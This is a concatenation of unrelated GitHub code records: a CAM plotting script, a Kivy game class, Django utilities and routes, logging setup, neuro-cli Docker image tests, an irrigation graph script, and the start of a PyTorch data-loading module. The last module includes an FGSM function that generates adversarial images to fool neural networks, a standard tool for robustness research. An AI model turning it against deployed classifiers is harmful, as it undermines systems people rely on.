true_positive = True if (logit < 0.5) else False\n else:\n true_positive = True if (logit >= 0.5) else False\n tmp_id = 0\n\n if true_positive:\n print('!> Plotting CAM for class {}.'.format(j))\n # generate class activation mapping for the top1 prediction\n CAMs = returnCAM(features_blobs[0], weight_softmax,\n [tmp_id], size_upsample=(1, input_size))\n plot(x, CAMs, 'db_{}_cls_{}_config_{}'.format(\n args.dataset, j, config[args.model_configuration]['Paper_name']))\n else:\n temp_i += 1\n\n '''\n # render the CAM and output\n print('output CAM.jpg for the top1 prediction: %s' % idx[0])\n #img = cv2.imread('test.jpg')\n #height, width, _ = img.shape\n heatmap = cv2.applyColorMap(cv2.resize(\n CAMs[0], (1, input_size)), cv2.COLORMAP_JET)\n #result = heatmap * 0.3 + img * 0.5\n cv2.imwrite('CAM.jpg', heatmap)\n '''\n\n\nif __name__ == \"__main__\":\n args = argparser()\n main(args)\n","repo_name":"TeCSAR-UNCC/ATCN","sub_path":"CAM.py","file_name":"CAM.py","file_ext":"py","file_size_in_byte":7539,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"1218253380","text":"from kivy.animation import Animation\nfrom kivy.clock import Clock\nfrom kivy.graphics import Color, Rectangle\nfrom kivy.properties import ListProperty\nfrom kivy.uix.widget import Widget\n\n\nclass Platform(Widget):\n velocity = ListProperty([0, 0])\n\n def __init__(self, player, isBooster, **kwargs):\n super(Platform, self).__init__(**kwargs)\n self.pos = kwargs['pos']\n self.size = kwargs['size']\n self.player = player\n self.isBooster = isBooster\n self.paused = False\n self.background_movement_speed = 20\n\n def update(self, *args):\n if self.paused:\n return\n\n self.platform_player_collision()\n if self.player.boost_active:\n self.boost_platform()\n else:\n self.move_platform()\n self.x += self.velocity[0]\n self.y += self.velocity[1]\n self.draw()\n\n def draw(self, *args):\n self.canvas.clear()\n with self.canvas:\n if not self.isBooster:\n Color(1., 1., 1.)\n else:\n Color(0., 1., 0.)\n Rectangle(pos=self.pos, size=(175, 15))\n\n def platform_player_collision(self):\n # check player collision with platforms\n if self.player.collide_widget(self):\n if 
self.player.velocity[1] < -5 and self.player.pos[1] > self.pos[1] - self.height / 2 \\\n and (2 > self.velocity[1] > -2):\n if self.isBooster:\n self.player.boost_active = True\n self.player.bounce_value = 25\n self.player.gravity /= 1.5\n self.player.velocity[1] = self.player.bounce_value\n\n def boost_platform(self):\n self.velocity[1] = self.player.platform_boost_velocity\n if self.velocity[1] < -40:\n self.player.boost_slowdown = True\n\n def move_platform(self):\n # update height of platforms\n if self.player.pos[1] >= 300 and not self.player.boost_active:\n # self.velocity[1] -= 2\n if self.player.velocity[1] > 0:\n if self.player.platform_velocity > -self.player.velocity[1]:\n self.player.platform_velocity -= 0.4\n\n else: # player is vertically decelerating\n if self.player.platform_velocity < 0:\n self.player.platform_velocity += 0.1\n self.velocity[1] = self.player.platform_velocity\n\n # if self.velocity[1] < self.background_movement_speed:\n # self.velocity[1] = -self.background_movement_speed\n else:\n # deceleration of platform when the player is not at the threshold until platform is stopped\n if self.velocity[1] < 0:\n self.velocity[1] += 1\n else:\n self.velocity[1] = 0","repo_name":"Filbert-code/GeoJump","sub_path":"Platform.py","file_name":"Platform.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"71146722020","text":"from django.core.exceptions import ValidationError\nfrom datetime import date, timedelta, datetime\n\nfrom random import randrange\nfrom django.utils.translation import get_language\nfrom webs.messages import MESSAGE_DICTIONARY\n\nimport os\nimport re\nfrom uuid import uuid4\n\nfrom PIL import Image\nimport copy\n\n\ndef merge_dicts(dict1, dict2):\n for k in set(dict1.keys()).union(dict2.keys()):\n if k in dict1 and k in dict2:\n if isinstance(dict1[k], dict) and isinstance(dict2[k], dict):\n yield (k, dict(merge_dicts(dict1[k], dict2[k])))\n else:\n yield (k, dict2[k])\n elif k in dict1:\n yield (k, dict1[k])\n else:\n yield (k, dict2[k])\n\n\ndef validate_image(fieldfile_obj):\n im = Image.open(fieldfile_obj.file)\n im.verify()\n\n width, height = im.size\n file_size = 1\n\n megabyte_limit = 2.0\n if file_size > megabyte_limit * 1024 * 1024:\n raise ValidationError(\"Max file size is %sMB\" % str(megabyte_limit))\n\n\ndef today():\n return date.today()\n\n\ndef day_add(time, number):\n try:\n return time + timedelta(days=number)\n except (ValueError, TypeError):\n return None\n\n\ndef day_sub(time, number):\n try:\n return time - timedelta(days=number)\n except (ValueError, TypeError):\n return None\n\n\ndef now():\n return datetime.now()\n\n\n# time is datetime\ndef time_slot(time, hour_from, hour_to):\n try:\n to_day = time.date().strftime(\"%d/%m/%Y\")\n except AttributeError:\n return None, None\n\n time_slot_from = datetime.strptime(\n '{} {:02}:00:00'.format(to_day, hour_from), '%d/%m/%Y %H:%M:%S')\n time_slot_to = datetime.strptime(\n '{} {:02}:00:00'.format(to_day, hour_to), '%d/%m/%Y %H:%M:%S')\n\n return time_slot_from, time_slot_to\n\n\n# time is datetime\ndef time_slot_from_string(time, time_from, time_to):\n try:\n to_day = time.date().strftime(\"%d/%m/%Y\")\n except AttributeError:\n return None, None\n\n time_slot_from = datetime.strptime(\n '{} {}'.format(to_day, time_from), '%d/%m/%Y %H:%M:%S')\n time_slot_to = datetime.strptime(\n '{} {}'.format(to_day, time_to), '%d/%m/%Y %H:%M:%S')\n\n return time_slot_from, time_slot_to\n\n\n# 
time is datetime\ndef time_from_string(time, time_string):\n try:\n to_day = time.date().strftime(\"%d/%m/%Y\")\n except AttributeError:\n return None\n\n _time = datetime.strptime('{} {}'.format(\n to_day, time_string), '%d/%m/%Y %H:%M:%S')\n\n return _time\n\n\ndef start_a_day(_date):\n try:\n to_day = _date.strftime(\"%d/%m/%Y\")\n except AttributeError:\n return None\n\n _time = datetime.strptime(\n '{} 00:00:00'.format(to_day), '%d/%m/%Y %H:%M:%S')\n\n return _time\n\n\ndef end_a_day(_date):\n try:\n to_day = _date.strftime(\"%d/%m/%Y\")\n except AttributeError:\n return None\n\n _time = datetime.strptime(\n '{} 23:59:59'.format(to_day), '%d/%m/%Y %H:%M:%S')\n\n return _time\n\n\ndef last_day_of_month(any_day):\n next_month = any_day.replace(day=28) + timedelta(days=4)\n return next_month - timedelta(days=next_month.day)\n\n\nfrom django.utils.deconstruct import deconstructible\n\n\n@deconstructible\nclass PathAndRename(object):\n def __init__(self, sub_path):\n self.path = sub_path\n\n def __call__(self, instance, filename):\n upload_to = self.path\n ext = filename.split('.')[-1]\n # get filename\n if instance.pk:\n filename = '{}.{}'.format(instance.pk, ext)\n else:\n # set filename as random string\n filename = '{}.{}'.format(uuid4().hex, ext)\n # return the whole path to the file\n return os.path.join(upload_to, filename)\n\n\ndef format_number(value):\n if value != 0:\n _value = int(value)\n return (\"{:,d}\".format(_value)).replace(\",\", \"X\").replace(\".\", \",\").replace(\"X\", \".\") if _value > 0 else ''\n return 0\n\n\ndef string_to_time(_string, _format='%d/%m/%Y %H:%M:%S'):\n try:\n return datetime.strptime(_string, _format)\n except (ValueError, IndexError, AttributeError):\n return None\n\n\ndef time_to_string(_time, _format='%d/%m/%Y %H:%M:%S'):\n if _time:\n return _time.strftime(_format)\n return ''\n\n\ndef set_toastr_message(request, _type, _message):\n request.session['csrf_coop_type'] = _type\n request.session['csrf_coop_message'] = _message\n\n\ndef get_toastr_message(request):\n if request.session.get('csrf_coop_message') and request.session.get('csrf_coop_type'):\n type = request.session['csrf_coop_type']\n message = request.session['csrf_coop_message']\n del request.session['csrf_coop_message']\n\n return type, message\n\n return None, None\n\n\ndef get_message(code):\n try:\n _code = int(code)\n language = get_language()\n\n mess_dict = MESSAGE_DICTIONARY[_code]\n\n if mess_dict:\n return mess_dict[language]\n\n return ''\n except KeyError:\n return ''\n\n\ndef mobile_valid(mobile):\n if mobile:\n try:\n mobile = re.sub(\"[^\\d+]\", \"\", mobile.replace('\\\\', ''))\n except ValueError:\n mobile = None\n\n return mobile\n\n\ndef check_email_valid(email):\n pattern = r'^(([^<>()\\[\\]\\\\.,:\\s@\"]+(\\.[^<>()\\[\\]\\\\.,:\\s@\"]+)*)|(\".+\"))@((\\[[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}])|(([a-zA-Z\\-0-9]+\\.)+[a-zA-Z]{2,}))'\n\n regex = re.compile(pattern)\n\n if regex.search(email):\n return\n\n\ndef convert_none_to_empty(x):\n ret = copy.deepcopy(x)\n if isinstance(x, dict):\n for k, v in ret.items():\n ret[k] = convert_none_to_empty(v)\n if isinstance(x, (list, tuple)):\n for k, v in enumerate(ret):\n ret[k] = convert_none_to_empty(v)\n if x is None:\n ret = ''\n return ret\n","repo_name":"honghuynhit/django_tut","sub_path":"library/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} 
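A quick usage sketch for the date helpers in the function.py record above — hedged, not part of the original corpus: it assumes library/function.py (the record's sub_path) is importable, and all values are hypothetical.

    from datetime import datetime
    from library import function  # module path taken from the record's sub_path; an assumption

    dt = datetime(2023, 5, 1, 10, 30)             # any datetime works
    print(function.time_slot(dt, 9, 17))          # (datetime(2023, 5, 1, 9, 0), datetime(2023, 5, 1, 17, 0))
    print(function.start_a_day(dt))               # 2023-05-01 00:00:00
    print(function.end_a_day(dt))                 # 2023-05-01 23:59:59
    print(function.last_day_of_month(dt.date()))  # 2023-05-31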
+{"seq_id":"23795474494","text":"\"\"\"Module that handles logger setup.\"\"\"\nimport logging\nimport os\n\nfrom pythonjsonlogger import jsonlogger\n\n# Adapted from https://docs.python.org/2/library/logging.html#logrecord-attributes\n_LOG_LEVEL = os.environ.get('LOG_LEVEL', 'INFO').upper()\n_LOG_FORMAT = '%(asctime)%(levelname)%(message)%(name)'\n_LOG_FORMATTER = jsonlogger.JsonFormatter(_LOG_FORMAT)\n\n\ndef _raise_test_plugin_logging_level_to_error() -> None:\n \"\"\"Raise the default test plugin logging level to `ERROR`.\n\n Some test plugin loggers have a default logging level of `debug`. This severely hinders\n debugabbility of code, since test plugin logs will swamp `stdout` if any test fails.\n\n To resolve this, we raise the default logging level of test plugin to `ERROR` here.\n\n \"\"\"\n logging.getLogger('flake8').setLevel(logging.ERROR)\n logging.getLogger('filelock').setLevel(logging.ERROR)\n\n\ndef configure_logging() -> None:\n \"\"\"Configure the project logging.\n\n This function configures the project logging, all loggers instantiated after calling\n this function will inherit this configuration.\n\n This function should be called at the very start of running the application, else loggers\n with different configurations may be instantiated.\n\n \"\"\"\n _raise_test_plugin_logging_level_to_error()\n\n log_handler = logging.StreamHandler()\n log_handler.setFormatter(_LOG_FORMATTER)\n\n root_logger = logging.getLogger()\n root_logger.setLevel(_LOG_LEVEL)\n root_logger.addHandler(log_handler)\n","repo_name":"BracketJohn/is-this-an-mlm","sub_path":"backend/src/backend/_logging.py","file_name":"_logging.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"71446999462","text":"import requests\nfrom datetime import datetime\nfrom datetime import timedelta\nimport time\nfrom utils import get_wallet_balance, get_if_user_has_open_bet\nfrom constants import wallet\n\n\nnow = round(datetime.timestamp(datetime.now()), 0)\n\n\nINITIAL_BALANCE = get_wallet_balance(wallet)\nCURRENT_BALANCE = get_wallet_balance(wallet)\nLOSS_LIMIT_PERCENTAGE = 0.7\n\n\ncurrent_hour = datetime.utcfromtimestamp(now).hour\ncurrent_minute = datetime.utcfromtimestamp(now).minute\n\n\nwhile True:\n has_open_bet = get_if_user_has_open_bet()\n\n if current_hour == 0 and current_minute == 0:\n INITIAL_BALANCE = get_wallet_balance(wallet)\n\n CURRENT_BALANCE = get_wallet_balance(wallet)\n\n if not has_open_bet and CURRENT_BALANCE <= INITIAL_BALANCE * LOSS_LIMIT_PERCENTAGE:\n print('SHIT JUST HIT THE FAN BROU!')\n\n time.sleep(60)\n","repo_name":"jeezascodes/pancakeBot","sub_path":"stop_loss.py","file_name":"stop_loss.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41113304324","text":"import asyncio\nimport re\nimport subprocess\nimport time\nfrom dataclasses import replace\nfrom pathlib import Path\nfrom typing import Any, AsyncIterator, Set\nfrom uuid import uuid4 as uuid\n\nimport aiodocker\nimport pytest\nfrom yarl import URL\n\nfrom neuro_sdk import CONFIG_ENV_NAME, DEFAULT_CONFIG_PATH, JobStatus\n\nfrom tests.e2e import Helper, make_image_name\n\n\ndef parse_docker_ls_output(docker_ls_output: Any) -> Set[str]:\n return {\n repo_tag\n for info in docker_ls_output\n if info[\"RepoTags\"] is not None\n for repo_tag in info[\"RepoTags\"]\n if repo_tag\n }\n\n\n@pytest.fixture()\ndef tag() -> str:\n return 
str(uuid())\n\n\nasync def generate_image(docker: aiodocker.Docker, tag: str) -> str:\n name = make_image_name()\n image_archive = Path(__file__).parent / \"assets/echo-tag.tar\"\n # TODO use random image name here\n image_name = f\"{name}:{tag}\"\n with image_archive.open(mode=\"r+b\") as fileobj:\n await docker.images.build(\n fileobj=fileobj, tag=image_name, buildargs={\"TAG\": tag}, encoding=\"identity\"\n )\n\n return image_name\n\n\n@pytest.fixture()\nasync def image(docker: aiodocker.Docker, tag: str) -> AsyncIterator[str]:\n image = await generate_image(docker, tag)\n yield image\n await docker.images.delete(image, force=True)\n\n\n@pytest.mark.e2e\ndef test_images_complete_lifecycle(\n request: Any,\n helper: Helper,\n image: str,\n tag: str,\n event_loop: asyncio.AbstractEventLoop,\n docker: aiodocker.Docker,\n) -> None:\n image_full_str = f\"image://{helper.cluster_uri_base}/{image}\"\n image_full_str_no_tag = image_full_str.replace(f\":{tag}\", \"\")\n request.addfinalizer(lambda: helper.run_cli([\"image\", \"rm\", image_full_str_no_tag]))\n # Let`s push image\n captured = helper.run_cli([\"image\", \"push\", image])\n event_loop.run_until_complete(\n docker.images.delete(f\"{helper.registry_name_base}/{image}\", force=True)\n )\n\n # stderr has \"Used image ...\" lines\n # assert not captured.err\n\n assert captured.out.endswith(image_full_str)\n image_url = URL(image_full_str)\n\n # Check if image available on registry\n image_full_str = f\"image://{helper.cluster_uri_base}/{image}\"\n image_short_str = f\"image:{image}\"\n assert captured.out.endswith(image_full_str)\n\n image_short_str_no_tag = image_short_str.replace(f\":{tag}\", \"\")\n\n # check ls short mode\n captured = helper.run_cli([\"image\", \"ls\"])\n assert image_short_str_no_tag in [\n line.strip() for line in captured.out.splitlines()\n ]\n\n captured = helper.run_cli([\"image\", \"ls\", \"--full-uri\"])\n assert image_full_str_no_tag in [line.strip() for line in captured.out.splitlines()]\n\n # check ls long mode\n captured = helper.run_cli([\"image\", \"ls\", \"-l\"])\n for line in captured.out.splitlines():\n if image_short_str_no_tag in line:\n break\n else:\n assert False, f\"Not found {image_short_str_no_tag} in {captured.out}\"\n\n # delete local\n event_loop.run_until_complete(docker.images.delete(image, force=True))\n docker_ls_output = event_loop.run_until_complete(docker.images.list())\n local_images = parse_docker_ls_output(docker_ls_output)\n assert image not in local_images\n\n # Pull image as with another tag\n captured = helper.run_cli([\"image\", \"pull\", f\"image:{image}\"])\n # stderr has \"Used image ...\" lines\n # assert not captured.err\n assert captured.out.endswith(image)\n\n # check pulled locally, delete for cleanup\n docker_ls_output = event_loop.run_until_complete(docker.images.list())\n local_images = parse_docker_ls_output(docker_ls_output)\n assert image in local_images\n\n # Execute image and check result\n captured = helper.run_cli_run_job([\"--no-wait-start\", str(image_url)], verbosity=-1)\n assert not captured.err\n job_id = captured.out\n assert job_id.startswith(\"job-\")\n helper.wait_job_change_state_to(job_id, JobStatus.SUCCEEDED, JobStatus.FAILED)\n\n helper.check_job_output(job_id, re.escape(tag))\n\n\n@pytest.mark.e2e\ndef test_image_tags(\n request: Any,\n helper: Helper,\n image: str,\n tag: str,\n event_loop: asyncio.AbstractEventLoop,\n docker: aiodocker.Docker,\n) -> None:\n image_full_str = f\"image://{helper.cluster_uri_base}/{image}\"\n 
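# (hedged note, not in the original) image URIs follow image://<cluster>/<name>:<tag>;\n    # stripping \":<tag>\" below yields the repository URI that \"neuro image tags\" lists.\n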
image_full_str_no_tag = image_full_str.replace(f\":{tag}\", \"\")\n request.addfinalizer(lambda: helper.run_cli([\"image\", \"rm\", image_full_str_no_tag]))\n # push image\n captured = helper.run_cli([\"image\", \"push\", image])\n event_loop.run_until_complete(\n docker.images.delete(f\"{helper.registry_name_base}/{image}\", force=True)\n )\n\n assert captured.out.endswith(image_full_str)\n\n delay = 0\n t0 = time.time()\n\n while time.time() - t0 < 600:\n time.sleep(delay)\n # check the tag is present now\n try:\n captured = helper.run_cli(\n [\"image\", \"tags\", image_full_str_no_tag], timeout=300\n )\n except subprocess.TimeoutExpired:\n continue\n if tag in map(lambda s: s.strip(), captured.out.splitlines()):\n break\n # Give a chance to sync remote registries\n delay = min(delay * 2 + 1, 15)\n else:\n raise AssertionError(\n f\"Delay is reached on waiting for tag {tag} in {captured.out}\"\n )\n\n cmd = f\"neuro image tags {image_full_str}\"\n result = subprocess.run(cmd, capture_output=True, shell=True)\n assertion_msg = f\"Command {cmd} should fail: {result.stdout!r} {result.stderr!r}\"\n assert result.returncode, assertion_msg\n\n image_full_str_latest_tag = image_full_str.replace(f\":{tag}\", \":latest\")\n cmd = f\"neuro image tags {image_full_str_latest_tag}\"\n result = subprocess.run(cmd, capture_output=True, shell=True)\n assertion_msg = f\"Command {cmd} should fail: {result.stdout!r} {result.stderr!r}\"\n assert result.returncode, assertion_msg\n\n\n@pytest.mark.e2e\nasync def test_images_delete(\n request: Any,\n helper: Helper,\n docker: aiodocker.Docker,\n) -> None:\n image_ref = await generate_image(docker, tag=\"latest\")\n name, _ = image_ref.split(\":\")\n img_name = f\"image:{name}\"\n\n helper.run_cli([\"image\", \"push\", image_ref])\n try:\n await docker.images.delete(image_ref, force=True)\n await docker.images.delete(\n f\"{helper.registry_name_base}/{image_ref}\", force=True\n )\n\n captured = helper.run_cli([\"-q\", \"image\", \"ls\"])\n assert img_name in captured.out\n finally:\n helper.run_cli([\"image\", \"rm\", img_name])\n\n for _ in range(10):\n captured = helper.run_cli([\"-q\", \"image\", \"ls\"])\n if img_name in captured.out:\n time.sleep(5)\n else:\n break\n\n assert img_name not in captured.out\n\n\n@pytest.mark.e2e\nasync def test_images_push_with_specified_name(\n request: Any,\n helper: Helper,\n image: str,\n tag: str,\n event_loop: asyncio.AbstractEventLoop,\n docker: aiodocker.Docker,\n) -> None:\n # Let`s push image\n image_no_tag = image.replace(f\":{tag}\", \"\")\n pushed_no_tag = f\"{image_no_tag}-pushed\"\n pulled_no_tag = f\"{image_no_tag}-pulled\"\n pulled = f\"{pulled_no_tag}:{tag}\"\n request.addfinalizer(\n lambda: helper.run_cli([\"image\", \"rm\", f\"image:{pushed_no_tag}\"])\n )\n\n captured = helper.run_cli([\"image\", \"push\", image, f\"image:{pushed_no_tag}:{tag}\"])\n # stderr has \"Used image ...\" lines\n # assert not captured.err\n image_pushed_full_str = f\"image://{helper.cluster_uri_base}/{pushed_no_tag}:{tag}\"\n async with helper.client() as client:\n assert captured.out.endswith(image_pushed_full_str)\n\n # Check if image available on registry\n docker_ls_output = await docker.images.list()\n local_images = parse_docker_ls_output(docker_ls_output)\n assert pulled not in local_images\n\n async with helper.client() as client:\n image_pushed_full = client.parse.remote_image(image_pushed_full_str)\n image_url_without_tag = replace(image_pushed_full, tag=None)\n imgs = await client.images.list()\n assert 
image_url_without_tag in imgs\n\n # check locally\n docker_ls_output = await docker.images.list()\n local_images = parse_docker_ls_output(docker_ls_output)\n assert pulled not in local_images\n\n # Pull image as with another name\n captured = helper.run_cli([\"image\", \"pull\", f\"image:{pushed_no_tag}:{tag}\", pulled])\n try:\n # stderr has \"Used image ...\" lines\n # assert not captured.err\n assert captured.out.endswith(pulled)\n # check locally\n docker_ls_output = await docker.images.list()\n local_images = parse_docker_ls_output(docker_ls_output)\n assert pulled in local_images\n finally:\n await docker.images.delete(pulled, force=True)\n\n\n@pytest.mark.e2e\ndef test_docker_helper(\n request: Any,\n helper: Helper,\n image: str,\n tag: str,\n nmrc_path: Path,\n monkeypatch: Any,\n) -> None:\n monkeypatch.setenv(CONFIG_ENV_NAME, str(nmrc_path or DEFAULT_CONFIG_PATH))\n helper.run_cli([\"config\", \"docker\"])\n full_tag = f\"{helper.registry_name_base}/{image}\"\n rmi_cmd = f\"docker rmi {full_tag}\"\n request.addfinalizer(\n lambda: subprocess.run(rmi_cmd, capture_output=True, shell=True)\n )\n tag_cmd = f\"docker tag {image} {full_tag}\"\n result = subprocess.run(tag_cmd, capture_output=True, shell=True)\n assert (\n result.returncode == 0\n ), f\"Command {tag_cmd} failed: {result.stdout!r} {result.stderr!r} \"\n image_url = f\"image://{helper.cluster_uri_base}/{image}\"\n image_full_str_no_tag = image_url.replace(f\":{tag}\", \"\")\n request.addfinalizer(lambda: helper.run_cli([\"image\", \"rm\", image_full_str_no_tag]))\n push_cmd = f\"docker push {full_tag}\"\n result = subprocess.run(push_cmd, capture_output=True, shell=True)\n assert (\n result.returncode == 0\n ), f\"Command {push_cmd} failed: {result.stdout!r} {result.stderr!r} \"\n # Run image and check output\n job_id = helper.run_job_and_wait_state(\n image_url, \"\", wait_state=JobStatus.SUCCEEDED, stop_state=JobStatus.FAILED\n )\n helper.check_job_output(job_id, re.escape(tag))\n","repo_name":"neuro-inc/neuro-cli","sub_path":"neuro-cli/tests/e2e/test_e2e_images.py","file_name":"test_e2e_images.py","file_ext":"py","file_size_in_byte":10142,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"35"} +{"seq_id":"24784111327","text":"from django.conf.urls import url\nfrom . 
import views\n\nurlpatterns = [\n url(r'^$', views.indexlogin), #start as login\n url(r'^register$', views.register),#register page\n url(r'^create$', views.createuser), #registers the user\n url(r'^dashboard/$', views.dashboard),#main page\n url(r'^dashboard/(?P\\d+)$', views.dashboard), #dashboard redirect with user.\n url(r'^delete/(?P\\d+)$', views.delete),# Deletes a appointment \n url(r'^edit/(?P\\d+)$', views.edit),# Deletes a appointment \n \n url(r'^loginprocess$', views.loginprocess), #logs in the user\n url(r'^update$', views.update), #logs in the user\n url(r'^add/(?P\\d+)$', views.add),# add the trip process\n url(r'^add$', views.add),# add the trip process\n url(r'^logout$', views.logout),#log out\n]\n# url(r'^showappointment/(?P\\d+)$', views.showappointment),# show a appointment ","repo_name":"Exia01/Python","sub_path":"Django/Pending_Projects/PBeltExam4/main/apps/xapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"75027782820","text":"\n# Reads information from sqlite and creates graphs with plot.ly\n\nimport pandas as pd\nfrom sqlalchemy import create_engine # database connection\nimport datetime as dt\n\nimport plotly.plotly as py # interactive graphing\nimport plotly.graph_objs as go\n\nimport configparser\nimport argparse\nimport logging\n\nDEFAULT_CONFIG_FILE = \"config.ini\"\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", \"--config\", help=\"Config file. If not provided, \" + DEFAULT_CONFIG_FILE + \" will be used.\",\n default=DEFAULT_CONFIG_FILE)\n parser.add_argument(\"-v\", \"--verbose\", help=\"increase verbosity\", action=\"store_true\")\n args = parser.parse_args()\n\n config = configparser.ConfigParser()\n try:\n config.read(args.config)\n\n except:\n print('Error reading config file')\n exit()\n\n logger = logging.getLogger(config['Logging']['LoggerName'])\n disk_engine = create_engine('sqlite:///' + config['Database']['FilePath'])\n\n df_1 = pd.read_sql_query('SELECT date, moisture '\n 'FROM moistureRead '\n 'WHERE plant = 1 '\n 'ORDER BY date', disk_engine)\n\n # normalize\n moistureMaxLevel = int(config['Graph']['MoistureMaxLevel'])\n moistureMinLevel = int(config['Graph']['MoistureMinLevel'])\n\n #Note that the higher moisture level, the dryer and the lower, soil is more wet\n df_1['moisture'] = 100 - (\n (df_1[\"moisture\"] - moistureMaxLevel) / (moistureMinLevel - moistureMaxLevel)) * 100\n\n df_2 = pd.read_sql_query('SELECT date, waterAmount '\n 'FROM watering '\n 'WHERE plant = 1 '\n 'ORDER BY date', disk_engine)\n\n\n\n trace_1 = go.Scatter(\n x=df_1['date'],\n y=df_1['moisture'],\n name='Soil Moisture',\n mode='lines',\n line=dict(color='rgb(205, 12, 24)', width=2),\n connectgaps=True,\n )\n\n trace_2 = go.Scatter(\n x=df_2['date'],\n y=df_2['waterAmount'],\n name='Watering',\n yaxis='y2',\n mode='markers',\n marker=dict(\n size=10,\n color='rgb(49, 130, 189)',\n ),\n )\n\n layout = go.Layout(\n xaxis=dict(\n showline=True,\n showgrid=False,\n showticklabels=True,\n linecolor='rgb(204, 204, 204)',\n linewidth=2,\n ticks='outside',\n tickcolor='rgb(204, 204, 204)',\n tickwidth=2,\n ticklen=5,\n tickfont=dict(\n family='Arial',\n size=12,\n color='rgb(82, 82, 82)',\n ),\n ),\n yaxis=dict(\n title='Soil Moisture',\n showgrid=False,\n zeroline=True,\n showline=True,\n showticklabels=True,\n type='linear',\n range=[1, 100],\n dtick=20,\n ticksuffix='%'\n ),\n 
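        # (hedged note, not in the original) yaxis2 overlays the primary axis through\n        # overlaying='y' and side='right' - plotly's standard dual-axis pattern.\n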
yaxis2=dict(\n            title='Watering',\n            titlefont=dict(\n                color='rgb(49, 130, 189)'\n            ),\n            tickfont=dict(\n                color='rgb(49, 130, 189)'\n            ),\n            overlaying='y',\n            side='right',\n            range=[0, 0.2],\n            dtick=0.05,\n        )\n    )\n\n    fig = go.Figure(data=[trace_1, trace_2], layout=layout)\n    py.plot(fig, filename='Soil moisture evolution')\n","repo_name":"tjavier82/irrigation_system","sub_path":"daemon/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"18762683436","text":"\"\"\"Provides data loading functionality through data loaders, wrappers and helper functions.\"\"\"\n\nimport os\nimport multiprocessing as mp\nimport ctypes\nfrom typing import Tuple, List, Union\n\nimport numpy as np\nimport torch\nfrom torch import Tensor\nfrom torch.nn import Module, Sequential, CrossEntropyLoss\nfrom torch.utils.data.dataset import Dataset\nfrom torch.utils.data.dataloader import DataLoader\nfrom torchvision.transforms import (Compose, ToTensor, Normalize, RandomHorizontalFlip, RandomCrop, CenterCrop, Resize,\n                                    RandomResizedCrop, RandomAffine, ColorJitter, RandomRotation)\nfrom torchvision.datasets import MNIST, KMNIST, CIFAR10, SVHN, ImageFolder\nfrom tqdm import tqdm\nfrom PIL import Image\nfrom PIL.Image import Image as Img\nimport scipy.io\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\nImage.MAX_IMAGE_PIXELS = 688290000\ntorch.manual_seed(0)\n\n\ndef fgsm(model: Union[Module, Sequential],\n         images: Tensor,\n         labels: Tensor,\n         criterion=CrossEntropyLoss(),\n         epsilon: float = 0.1) -> Tensor:\n    \"\"\"The Fast Gradient Sign Method from `Explaining and Harnessing Adversarial Examples\n    <https://arxiv.org/abs/1412.6572>`_ by Goodfellow et al.\n\n    The main idea is to change each pixel in the image according to the sign of the gradient of the loss w.r.t. the\n    image pixels by a small amount. This implementation is adapted from the `PyTorch tutorial\n    <https://pytorch.org/tutorials/beginner/fgsm_tutorial.html>`_.\n\n    Args:\n        model: A `torchvision` or custom neural network.\n        images: The image data.\n        labels: The class labels.\n        criterion (optional): Any PyTorch loss criterion.\n        epsilon (optional): The step size of the FGSM.\n\n    Returns:\n        Tensor: The perturbed images.\n    \"\"\"\n    vmin, vmax = images.min().numpy(), images.max().numpy()\n    images.requires_grad = True\n\n    logits = model(images)\n    loss = criterion(logits, labels)\n    model.zero_grad()\n    loss.backward()\n\n    data_grad = images.grad.data\n    sign_data_grad = data_grad.sign()\n    perturbed_image = images + epsilon * sign_data_grad\n    perturbed_image = torch.clamp(perturbed_image, vmin, vmax)\n\n    return perturbed_image\n\n\nclass Binarize:\n    \"\"\"Randomly binarizes monochrome images where pixel values determine the probability.\"\"\"\n\n    def __call__(self,\n                 pic: Img):\n        \"\"\"Randomly binarizes a monochrome image where pixel values determine the probability.\n\n        Args:\n            pic: A single monochrome image.\n\n        Returns:\n            The binarized image.\n        \"\"\"\n        return Image.fromarray(np.uint8(np.random.binomial(1, np.array(pic) / 255) * 255))\n\n\nclass Memory(Dataset):\n    \"\"\"Stores a dataset in RAM.\"\"\"\n\n    def __init__(self,\n                 data: Dataset,\n                 img_size: int = 224,\n                 channels: int = 3):\n        \"\"\"Creates a `Memory` object, storing a dataset in RAM.\n\n        Args:\n            data: A PyTorch dataset.\n            img_size (optional): The size of the image.\n            channels (optional): Number of color channels, i.e. 
